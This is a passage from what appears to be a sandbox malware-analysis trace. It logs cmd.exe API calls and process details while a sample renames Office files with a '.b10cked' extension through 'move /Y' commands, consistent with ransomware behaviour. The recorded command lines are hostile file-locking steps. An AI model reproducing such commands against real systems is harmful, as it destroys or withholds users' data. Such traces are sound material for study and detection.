[0159.066] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0159.066] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0159.066] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0159.066] _wcsicmp (_String1="move", _String2="START") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0159.066] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0159.066] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0159.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.068] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f4a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f49c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f49c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0159.069] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0159.069] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 
69 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl~1.trx")) returned 0x2020 [0159.070] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.070] SetErrorMode (uMode=0x0) returned 0x0 [0159.070] SetErrorMode (uMode=0x1) returned 0x0 [0159.070] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x24ee2c, lpFilePart=0x24ee14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", lpFilePart=0x24ee14*="STINTL~1.TRX") returned 0x3c [0159.070] SetErrorMode (uMode=0x0) returned 0x1 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl~1.trx")) returned 0x2020 [0159.070] SetErrorMode (uMode=0x0) returned 0x0 [0159.070] SetErrorMode (uMode=0x1) returned 0x0 [0159.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x24f2a8, lpFilePart=0x24f040 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", lpFilePart=0x24f040*="STINTL~1.TRX") returned 0x3c [0159.071] SetErrorMode (uMode=0x0) returned 0x1 [0159.071] SetErrorMode (uMode=0x0) returned 0x0 [0159.071] SetErrorMode (uMode=0x1) returned 0x0 [0159.071] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f4b0, lpFilePart=0x24f040 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x24f040*="STINTL.DLL.trx_dll.b10cked") returned 0x4a [0159.071] SetErrorMode (uMode=0x0) returned 0x1 [0159.071] SetLastError (dwErrCode=0x0) [0159.071] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll.b10cked")) returned 0xffffffff [0159.071] GetLastError () returned 0x2 [0159.071] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x24e9bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e9bc) returned 0x3f2128 [0159.071] FindNextFileW (in: hFindFile=0x3f2128, lpFindFileData=0x24e9bc | out: lpFindFileData=0x24e9bc) returned 0 [0159.072] GetLastError () returned 0x12 [0159.072] FindClose (in: hFindFile=0x3f2128 | out: hFindFile=0x3f2128) returned 1 [0159.073] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3f1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3f1cb8) returned 0x3f2128 [0159.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0159.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0159.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll")) returned 0x2020 [0159.073] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0159.074] FindClose (in: hFindFile=0x3f2128 | out: hFindFile=0x3f2128) returned 1 [0159.074] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec08 | out: _Buffer=" 1") returned 9 [0159.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.074] GetFileType (hFile=0x7) returned 0x2 [0159.074] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24eb94 | out: lpMode=0x24eb94) returned 1 [0159.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ebc8 | out: lpConsoleScreenBufferInfo=0x24ebc8) returned 1 [0159.075] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0159.075] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ec08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0159.075] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x24ebec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ebec*=0x1a) returned 1 [0159.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.075] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.076] SetConsoleInputExeNameW () returned 0x1 [0159.076] GetConsoleOutputCP () returned 0x1b5 [0159.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.076] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.076] exit (_Code=0) Process: id = "270" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22020 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22021 start_va = 0x30000 end_va = 0x12ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 22022 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 22023 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 22024 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22025 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22026 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22027 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22028 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22029 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22041 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22042 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22043 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22044 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22045 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 22046 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22047 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22049 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22050 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22051 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22052 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22053 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22054 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22055 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 22056 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22057 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22058 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22059 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22060 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22061 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22062 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 22063 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 22064 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000001130000" filename = "" Thread: id = 333 os_tid = 0x7f8 [0159.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc6c | out: lpSystemTimeAsFileTime=0x12fc6c*(dwLowDateTime=0x99132b40, dwHighDateTime=0x1d440a9)) [0159.857] GetCurrentProcessId () returned 0x7ac [0159.857] GetCurrentThreadId () returned 0x7f8 [0159.857] GetTickCount () returned 0x30c6e [0159.857] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc64 | out: lpPerformanceCount=0x12fc64*=21664607724) returned 1 [0159.858] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0159.858] __set_app_type (_Type=0x1) [0159.858] __p__fmode () returned 0x76b331f4 [0159.858] __p__commode () returned 0x76b331fc [0159.858] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0159.858] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0159.858] GetCurrentThreadId () returned 0x7f8 [0159.858] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f8) returned 0x38 [0159.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.858] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0159.858] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.859] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.859] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fbfc | out: phkResult=0x12fbfc*=0x0) returned 0x2 [0159.859] VirtualQuery (in: lpAddress=0x12fc33, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: 
lpAddress=0x30000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.859] GetConsoleOutputCP () returned 0x1b5 [0159.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.859] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0159.859] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.859] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0159.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.860] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.860] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.860] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.860] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.860] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.860] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0159.860] GetEnvironmentStringsW () returned 0x330210* [0159.861] FreeEnvironmentStringsW 
(penv=0x330210) returned 1 [0159.861] GetEnvironmentStringsW () returned 0x330210* [0159.861] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0159.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb6c | out: phkResult=0x12eb6c*=0x40) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0xa0, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x0, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x40, 
lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegCloseKey (hKey=0x40) returned 0x0 [0159.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb6c | out: phkResult=0x12eb6c*=0x40) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x0, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x4) returned 